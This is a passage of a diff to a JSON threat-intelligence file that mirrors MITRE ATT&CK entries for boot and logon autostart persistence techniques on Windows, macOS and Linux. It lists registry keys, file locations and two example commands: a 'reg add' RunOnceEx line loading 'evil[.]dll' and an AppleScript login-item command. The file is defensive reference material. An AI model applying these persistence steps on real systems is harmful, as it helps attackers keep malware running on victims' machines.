Deprecation](https://app.tidalcyber.com/references/86053c5a-f2dd-4eb3-9dc2-6a6a4e1c2ae5)]\n\nAdversaries can use LKMs and kexts to conduct [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) and/or [Privilege Escalation](https://app.tidalcyber.com/tactics/b17dde68-dbcf-4cfd-9bb8-be014ec65c37) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.[[Volatility Phalanx2](https://app.tidalcyber.com/references/6149f9ed-9218-489b-b87c-8208de89be68)][[CrowdStrike Linux Rootkit](https://app.tidalcyber.com/references/eb3590bf-ff12-4ccd-bf9d-cf8eacd82135)][[GitHub Reptile](https://app.tidalcyber.com/references/6e8cc88a-fb3f-4464-9380-868f597def6e)][[GitHub Diamorphine](https://app.tidalcyber.com/references/92993055-d2e6-46b2-92a3-ad70b62e4cc0)][[RSAC 2015 San Francisco Patrick Wardle](https://app.tidalcyber.com/references/7e3f3dda-c407-4b06-a6b0-8b72c4dad6e6)][[Synack Secure Kernel Extension Broken](https://app.tidalcyber.com/references/647f6be8-fe95-4045-8778-f7d7ff00c96c)][[Securelist Ventir](https://app.tidalcyber.com/references/5e4e82c0-16b6-43bc-a70d-6b8d55aaef52)][[Trend Micro Skidmap](https://app.tidalcyber.com/references/53291621-f0ad-4cb7-af08-78b96eb67168)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1547.006" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "74e2b24b-3bf7-4361-bc07-983bffe674f7", + "value": "Kernel Modules and Extensions" + }, + { + "description": "Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.[[Open Login Items Apple](https://app.tidalcyber.com/references/46a480eb-52d1-44c9-8b44-7e516b27cf82)] Login items can be added via a shared file list or Service Management Framework.[[Adding Login Items](https://app.tidalcyber.com/references/5ab3e243-37a6-46f1-b28f-6846ecdef0ae)] Shared file list login items can be set using scripting languages such as [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled.\n\nLogin items installed using the Service Management Framework leverage launchd, are not visible in the System Preferences, and can only be removed by the application that created them.[[Adding Login Items](https://app.tidalcyber.com/references/5ab3e243-37a6-46f1-b28f-6846ecdef0ae)][[SMLoginItemSetEnabled Schroeder 2013](https://app.tidalcyber.com/references/ad14bad2-95c8-49b0-9777-e464fc8359a0)] Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.[[Launch Services Apple Developer](https://app.tidalcyber.com/references/9973ceb1-2fee-451b-a512-c544671ee9fd)] Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.\n\nAdversaries can utilize [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701) and [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) calls to create a login item to spawn malicious executables.[[ELC Running at startup](https://app.tidalcyber.com/references/11ee6303-5103-4063-a765-659ead217c6c)] Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.[[Login Items AE](https://app.tidalcyber.com/references/d15943dd-d11c-4af2-a3ac-9ebe168a7526)] Adversaries can use a command such as tell application “System Events” to make login item at end with properties /path/to/executable.[[Startup Items Eclectic](https://app.tidalcyber.com/references/397be6f9-a109-4185-85f7-8d994fb31eaa)][[hexed osx.dok analysis 2019](https://app.tidalcyber.com/references/96f9d36a-01a5-418e-85f4-957e58d49c1b)][[Add List Remove Login Items Apple Script](https://app.tidalcyber.com/references/13773d75-6fc1-4289-bf45-6ee147279052)] This command adds the path of the malicious executable to the login item file list located in ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm.[[Startup Items Eclectic](https://app.tidalcyber.com/references/397be6f9-a109-4185-85f7-8d994fb31eaa)] Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.[[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)][[CheckPoint Dok](https://app.tidalcyber.com/references/8c178fd8-db34-45c6-901a-a8b2c178d809)][[objsee netwire backdoor 2019](https://app.tidalcyber.com/references/866c5305-8629-4f09-8dfe-192c8573ffb0)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1547.015" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "6556e1cb-87d0-4e67-9d5c-343d1eddf430", + "value": "Login Items" + }, + { + "description": "Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.[[Microsoft Security Subsystem](https://app.tidalcyber.com/references/27dae010-e3b3-4080-8039-9f89a29607e6)]\n\nAdversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://app.tidalcyber.com/technique/1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68)), an adversary can use LSA operations to continuously execute malicious payloads.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1547.008" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "bce86020-2851-4b01-97a9-e51a6b23ea68", + "value": "LSASS Driver" + }, + { + "description": "Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.[[AddMonitor](https://app.tidalcyber.com/references/8c1a719e-6ca1-4b41-966d-ddb87c849fe0)] This DLL can be located in C:\\Windows\\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.[[Bloxham](https://app.tidalcyber.com/references/b212d16f-5347-49ab-8339-432b4fd1ef50)] Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1547.010" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "ffd9430b-c727-47f4-a1f0-b1d4f8c29740", + "value": "Port Monitors" + }, + { + "description": "Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot.[[Microsoft Intro Print Processors](https://app.tidalcyber.com/references/ba04b0d0-1c39-5f48-824c-110ee7affbf3)]\n\nAdversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry key that points to the DLL.\n\nFor the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, that can be found with the GetPrintProcessorDirectory API call, or referenced via a relative path from this directory.[[Microsoft AddPrintProcessor May 2018](https://app.tidalcyber.com/references/12c7160b-c93c-44cd-b108-68d4823aec8c)] After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.[[ESET PipeMon May 2020](https://app.tidalcyber.com/references/cbc09411-be18-4241-be69-b718a741ed8c)]\n\nThe print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1547.012" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "f7544b99-d596-43dd-ab12-3844756f3ad7", + "value": "Print Processors" + }, + { + "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.[[Microsoft Run Key](https://app.tidalcyber.com/references/0d633a50-4afd-4479-898e-1a785f5637da)] These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nRun keys may exist under multiple hives.[[Microsoft Wow6432Node 2018](https://app.tidalcyber.com/references/cbc14af8-f0d9-46c9-ae2c-d93d706ac84e)][[Malwarebytes Wow6432Node 2016](https://app.tidalcyber.com/references/d4eba34c-d76b-45b4-bcaf-0f13459daaad)] The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.[[Microsoft Run Key](https://app.tidalcyber.com/references/0d633a50-4afd-4479-898e-1a785f5637da)] For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" [[Oddvar Moe RunOnceEx Mar 2018](https://app.tidalcyber.com/references/36d52213-8d9f-4642-892b-40460d5631d7)]\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup. The startup folder path for all users is C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp.\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n\nPrograms listed in the load value of the registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows run automatically for the currently logged-on user.\n\nBy default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to make the Registry entries look as if they are associated with legitimate programs.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1547.001" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "0ca28cc0-89d0-4680-baef-94d7202c6a9b", + "value": "Registry Run Keys / Startup Folder" + }, + { + "description": "Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to \"Reopen windows when logging back in\".[[Re-Open windows on Mac](https://app.tidalcyber.com/references/ed907f1e-71d6-45db-8ef3-75bec59c238b)] When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist within the ~/Library/Preferences/ByHost directory.[[Methods of Mac Malware Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)][[Wardle Persistence Chapter](https://app.tidalcyber.com/references/6272b9a2-d704-43f3-9e25-6c434bb5d1ef)] Applications listed in this file are automatically reopened upon the user’s next logon.\n\nAdversaries can establish [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist file to execute payloads when a user logs in.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1547.007" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "9459a27a-b892-4864-9916-814130bea485", + "value": "Re-opened Applications" + }, + { + "description": "Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.\n\nThe SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.[[Graeber 2014](https://app.tidalcyber.com/references/f2f9a6bf-b4d9-461e-b961-0610ea72faf0)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1547.005" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "8a6ec54e-c7cd-4e3c-b848-21f8be2f864a", + "value": "Security Support Provider" + }, + { + "description": "Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.\n\nAdversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.[[Shortcut for Persistence ](https://app.tidalcyber.com/references/4a12e927-0511-40b1-85f3-869ffc452c2e)] Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.\n\nShortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://app.tidalcyber.com/technique/040804f6-6a87-4011-8716-66682bc16ed4)) to persistently launch malware.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1547.009" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "bfde0a09-8109-41e4-b8c9-68fe20e8131b", + "value": "Shortcut Modification" + }, + { + "description": "Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.[[Microsoft W32Time Feb 2018](https://app.tidalcyber.com/references/991f7a9f-4317-42fa-bc9b-f533fe36b517)] W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.[[Microsoft TimeProvider](https://app.tidalcyber.com/references/cf7c1db8-6282-4ccd-9609-5a012faf70d6)]\n\nTime providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\.[[Microsoft TimeProvider](https://app.tidalcyber.com/references/cf7c1db8-6282-4ccd-9609-5a012faf70d6)] The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.[[Microsoft TimeProvider](https://app.tidalcyber.com/references/cf7c1db8-6282-4ccd-9609-5a012faf70d6)]\n\nAdversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.[[Github W32Time Oct 2017](https://app.tidalcyber.com/references/a248fd87-c3c1-4de7-a9af-0436a10f71aa)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1547.003" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "2e8cd9a0-846f-416b-80ba-21a15019ce73", + "value": "Time Providers" + }, + { + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon.[[Cylance Reg Persistence Sept 2013](https://app.tidalcyber.com/references/9e9c745f-19fd-4218-b8dc-85df804ecb70)] \n\nMalicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: [[Cylance Reg Persistence Sept 2013](https://app.tidalcyber.com/references/9e9c745f-19fd-4218-b8dc-85df804ecb70)]\n\n* Winlogon\\Notify - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - points to userinit.exe, the user initialization program executed when a user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on\n\nAdversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1547.004" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "6f42559d-fb54-4c82-9ea7-eb9c709dac07", + "value": "Winlogon Helper DLL" + }, + { + "description": "Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (`.desktop`) to configure the user’s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media.[[Free Desktop Application Autostart Feb 2006](https://app.tidalcyber.com/references/0885434e-3908-4425-9597-ce6abe531ca5)][[Free Desktop Entry Keys](https://app.tidalcyber.com/references/4ffb9866-1cf4-46d1-b7e5-d75bd98de018)]\n\nAdversaries may abuse this feature to establish persistence by adding a path to a malicious binary or command to the `Exec` directive in the `.desktop` configuration file. When the user’s desktop environment is loaded at user login, the `.desktop` files located in the XDG Autostart directories are automatically executed. System-wide Autostart entries are located in the `/etc/xdg/autostart` directory while the user entries are located in the `~/.config/autostart` directory.\n\nAdversaries may combine this technique with [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to blend malicious Autostart entries with legitimate programs.[[Red Canary Netwire Linux 2022](https://app.tidalcyber.com/references/6d4c6c52-38ae-52f5-b438-edeceed446a5)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1547.013" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "45f107b6-ae8e-49d7-a3fc-ea6437fbac76", + "value": "XDG Autostart Entries" + }, + { + "description": "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.[[Microsoft Run Key](https://app.tidalcyber.com/references/0d633a50-4afd-4479-898e-1a785f5637da)][[MSDN Authentication Packages](https://app.tidalcyber.com/references/e9bb8434-9b6d-4301-bfe2-5c83ceabb020)][[Microsoft TimeProvider](https://app.tidalcyber.com/references/cf7c1db8-6282-4ccd-9609-5a012faf70d6)][[Cylance Reg Persistence Sept 2013](https://app.tidalcyber.com/references/9e9c745f-19fd-4218-b8dc-85df804ecb70)][[Linux Kernel Programming](https://app.tidalcyber.com/references/70f31f19-e0b3-40b1-b8dd-6667557bb334)] These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.\n\nSince some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8bd564d2-a3f1-4367-8631-a2d2cb3a1f46", + "type": "similar" + }, + { + "dest-uuid": "7ede5868-1109-4f22-abc7-9495658f7866", + "type": "similar" + }, + { + "dest-uuid": "74e2b24b-3bf7-4361-bc07-983bffe674f7", + "type": "similar" + }, + { + "dest-uuid": "6556e1cb-87d0-4e67-9d5c-343d1eddf430", + "type": "similar" + }, + { + "dest-uuid": "bce86020-2851-4b01-97a9-e51a6b23ea68", + "type": "similar" + }, + { + "dest-uuid": "ffd9430b-c727-47f4-a1f0-b1d4f8c29740", + "type": "similar" + }, + { + "dest-uuid": "f7544b99-d596-43dd-ab12-3844756f3ad7", + "type": "similar" + }, + { + "dest-uuid": "0ca28cc0-89d0-4680-baef-94d7202c6a9b", + "type": "similar" + }, + { + "dest-uuid": "9459a27a-b892-4864-9916-814130bea485", + "type": "similar" + }, + { + "dest-uuid": "8a6ec54e-c7cd-4e3c-b848-21f8be2f864a", + "type": "similar" + }, + { + "dest-uuid": "bfde0a09-8109-41e4-b8c9-68fe20e8131b", + "type": "similar" + }, + { + "dest-uuid": "2e8cd9a0-846f-416b-80ba-21a15019ce73", + "type": "similar" + }, + { + "dest-uuid": "6f42559d-fb54-4c82-9ea7-eb9c709dac07", + "type": "similar" + }, + { + "dest-uuid": "45f107b6-ae8e-49d7-a3fc-ea6437fbac76", + "type": "similar" + } + ], + "uuid": "17b97c19-b986-4653-850a-44aee9aaaba1", + "value": "Boot or Logon Autostart Execution" + }, + { + "description": "Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the /Library/Preferences/com.apple.loginwindow.plist file and can be modified using the defaults command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.[[Login Scripts Apple Dev](https://app.tidalcyber.com/references/9c0094b6-a8e3-4f4d-8d2e-33b408d44a06)][[LoginWindowScripts Apple Dev](https://app.tidalcyber.com/references/340eb8df-cc22-4b59-8dca-32ec52fd6818)] \n\nAdversaries can add or insert a path to a malicious script in the com.apple.loginwindow.plist file, using the LoginHook or LogoutHook key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.[[S1 macOs Persistence](https://app.tidalcyber.com/references/ce952a0d-9c0d-4a51-9564-7cc5d9e43e2c)][[Wardle Persistence Chapter](https://app.tidalcyber.com/references/6272b9a2-d704-43f3-9e25-6c434bb5d1ef)]\n\n**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) and [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00) ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1037.002" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "fdf95fac-f7f2-4901-b5fe-b2bafa443939", + "value": "Login Hook" + }, + { + "description": "Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.[[TechNet Logon Scripts](https://app.tidalcyber.com/references/896cf5dd-3fe7-44ab-bbaf-d8b2b9980dca)] This is done via adding a path to a script to the HKCU\\Environment\\UserInitMprLogonScript Registry key.[[Hexacorn Logon Scripts](https://app.tidalcyber.com/references/bdcdfe9e-1f22-4472-9a86-faefcb5c5618)]\n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1037.001" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "b34ba0fd-493c-4e68-91c4-918f495ad07c", + "value": "Logon Script (Windows)" + }, + { + "description": "Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.[[Petri Logon Script AD](https://app.tidalcyber.com/references/1de42b0a-3dd6-4f75-bcf3-a2373e349a39)] These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems. \n \nAdversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1037.003" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "3701f955-596b-422e-9fce-09c4f49cf080", + "value": "Network Logon Script" + }, + { + "description": "Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.\n\nAdversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.[[IranThreats Kittens Dec 2017](https://app.tidalcyber.com/references/8338ad75-89f2-47d8-b85b-7cbf331bd7cd)][[Intezer HiddenWasp Map 2019](https://app.tidalcyber.com/references/dfef8451-031b-42a6-8b78-d25950cc9d23)] Upon reboot, the system executes the script's contents as root, resulting in persistence.\n\nAdversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.[[intezer-kaiji-malware](https://app.tidalcyber.com/references/ef1fbb40-da6f-41d0-a44a-9ff444e2ad89)]\n\nSeveral Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://app.tidalcyber.com/technique/). [[Apple Developer Doco Archive Launchd](https://app.tidalcyber.com/references/41311827-3d81-422a-9b07-ee8ddc2fc7f1)][[Startup Items](https://app.tidalcyber.com/references/e36dd211-22e4-4b23-befb-fbfe1a84b866)] This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.[[Methods of Mac Malware 